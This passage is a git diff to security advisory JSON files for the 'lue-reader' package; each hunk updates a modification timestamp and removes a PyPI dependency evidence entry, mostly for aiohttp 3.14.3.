"aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69223.json b/advisories/BREW-lue-reader-CVE-2025-69223.json index 33646555d4..280725fa41 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69223.json +++ b/advisories/BREW-lue-reader-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69223", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69224.json b/advisories/BREW-lue-reader-CVE-2025-69224.json index ae88a33803..2c4c2c0c6c 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69224.json +++ b/advisories/BREW-lue-reader-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69224", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69225.json b/advisories/BREW-lue-reader-CVE-2025-69225.json index 65bf555b33..9df6c5f0d8 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69225.json +++ b/advisories/BREW-lue-reader-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69225", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69226.json b/advisories/BREW-lue-reader-CVE-2025-69226.json index 83c74f80d7..be360367f1 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69226.json +++ b/advisories/BREW-lue-reader-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69226", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69227.json b/advisories/BREW-lue-reader-CVE-2025-69227.json index 081fc38c85..f1ae5f9e96 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69227.json +++ b/advisories/BREW-lue-reader-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69227", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69228.json b/advisories/BREW-lue-reader-CVE-2025-69228.json index dc56e4a2d0..d762c22cb5 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69228.json +++ b/advisories/BREW-lue-reader-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69228", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69229.json b/advisories/BREW-lue-reader-CVE-2025-69229.json index d6c096b030..0dc48f9a1f 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69229.json +++ b/advisories/BREW-lue-reader-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69229", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69230.json b/advisories/BREW-lue-reader-CVE-2025-69230.json index f59db7212d..f33341eee4 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69230.json +++ b/advisories/BREW-lue-reader-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69230", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69534.json b/advisories/BREW-lue-reader-CVE-2025-69534.json index 7503ce94df..17c5495aea 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69534.json +++ b/advisories/BREW-lue-reader-CVE-2025-69534.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69534", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5wmx-573v-2qwq", "CVE-2025-69534", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown", - "subject_version": "3.10.3", - "key": "pkg:pypi/markdown@3.10.3", - "resource": "markdown" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-22815.json b/advisories/BREW-lue-reader-CVE-2026-22815.json index 67cbf7b9de..9d4bec36eb 100644 --- a/advisories/BREW-lue-reader-CVE-2026-22815.json +++ b/advisories/BREW-lue-reader-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-22815", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34513.json b/advisories/BREW-lue-reader-CVE-2026-34513.json index 7a4549837b..5b63f947ab 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34513.json +++ b/advisories/BREW-lue-reader-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34513", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34514.json b/advisories/BREW-lue-reader-CVE-2026-34514.json index f9b6af5c85..09be60738e 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34514.json +++ b/advisories/BREW-lue-reader-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34514", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34515.json b/advisories/BREW-lue-reader-CVE-2026-34515.json index 06efbb18cf..b7d1f1af84 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34515.json +++ b/advisories/BREW-lue-reader-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34515", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34516.json b/advisories/BREW-lue-reader-CVE-2026-34516.json index 44f1aa42bf..8fe79d8b23 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34516.json +++ b/advisories/BREW-lue-reader-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34516", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34517.json b/advisories/BREW-lue-reader-CVE-2026-34517.json index c1627a0591..81356bef38 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34517.json +++ b/advisories/BREW-lue-reader-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34517", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34518.json b/advisories/BREW-lue-reader-CVE-2026-34518.json index a06efb3afc..1decf3cf03 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34518.json +++ b/advisories/BREW-lue-reader-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34518", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34519.json b/advisories/BREW-lue-reader-CVE-2026-34519.json index 620f1168ec..e0b1846194 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34519.json +++ b/advisories/BREW-lue-reader-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34519", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34520.json b/advisories/BREW-lue-reader-CVE-2026-34520.json index 14dee6e79a..ce5ef20f98 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34520.json +++ b/advisories/BREW-lue-reader-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34520", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34525.json b/advisories/BREW-lue-reader-CVE-2026-34525.json index ababd3f576..c3f2314547 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34525.json +++ b/advisories/BREW-lue-reader-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34525", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34993.json b/advisories/BREW-lue-reader-CVE-2026-34993.json index ea37bba554..7e46fdb421 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34993.json +++ b/advisories/BREW-lue-reader-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34993", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-41066.json b/advisories/BREW-lue-reader-CVE-2026-41066.json index cf20c16615..8168a61871 100644 --- a/advisories/BREW-lue-reader-CVE-2026-41066.json +++ b/advisories/BREW-lue-reader-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-41066", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-4539.json b/advisories/BREW-lue-reader-CVE-2026-4539.json index f5880993a0..ae478cf179 100644 --- a/advisories/BREW-lue-reader-CVE-2026-4539.json +++ b/advisories/BREW-lue-reader-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-4539", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-45409.json b/advisories/BREW-lue-reader-CVE-2026-45409.json index 321bdd4d79..8303973462 100644 --- a/advisories/BREW-lue-reader-CVE-2026-45409.json +++ b/advisories/BREW-lue-reader-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-45409", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-47265.json b/advisories/BREW-lue-reader-CVE-2026-47265.json index 4df48ff1f7..7d0cca1d16 100644 --- a/advisories/BREW-lue-reader-CVE-2026-47265.json +++ b/advisories/BREW-lue-reader-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-47265", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-50269.json b/advisories/BREW-lue-reader-CVE-2026-50269.json index 5752ae119e..e816f5864e 100644 --- a/advisories/BREW-lue-reader-CVE-2026-50269.json +++ b/advisories/BREW-lue-reader-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-50269", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54273.json b/advisories/BREW-lue-reader-CVE-2026-54273.json index e02e3370b7..a6aff695ad 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54273.json +++ b/advisories/BREW-lue-reader-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54273", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54274.json b/advisories/BREW-lue-reader-CVE-2026-54274.json index 0d148ea910..22b156aaf9 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54274.json +++ b/advisories/BREW-lue-reader-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54274", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54275.json b/advisories/BREW-lue-reader-CVE-2026-54275.json index 47fc4ef719..5efb20b782 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54275.json +++ b/advisories/BREW-lue-reader-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54275", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54276.json b/advisories/BREW-lue-reader-CVE-2026-54276.json index b7948cbc31..95d3e24b90 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54276.json +++ b/advisories/BREW-lue-reader-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54276", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54277.json b/advisories/BREW-lue-reader-CVE-2026-54277.json index acb70c0b8f..8f02af4611 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54277.json +++ b/advisories/BREW-lue-reader-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54277", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54278.json b/advisories/BREW-lue-reader-CVE-2026-54278.json index f5390af1f3..94d48218e4 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54278.json +++ b/advisories/BREW-lue-reader-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54278", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54279.json b/advisories/BREW-lue-reader-CVE-2026-54279.json index 1db7458c50..373dacc1af 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54279.json +++ b/advisories/BREW-lue-reader-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54279", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54280.json b/advisories/BREW-lue-reader-CVE-2026-54280.json index 1d40a3255a..ed5f93f436 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54280.json +++ b/advisories/BREW-lue-reader-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54280", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-59881.json b/advisories/BREW-lue-reader-CVE-2026-59881.json index f2268ecc75..130f80b774 100644 --- a/advisories/BREW-lue-reader-CVE-2026-59881.json +++ b/advisories/BREW-lue-reader-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-59881", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": 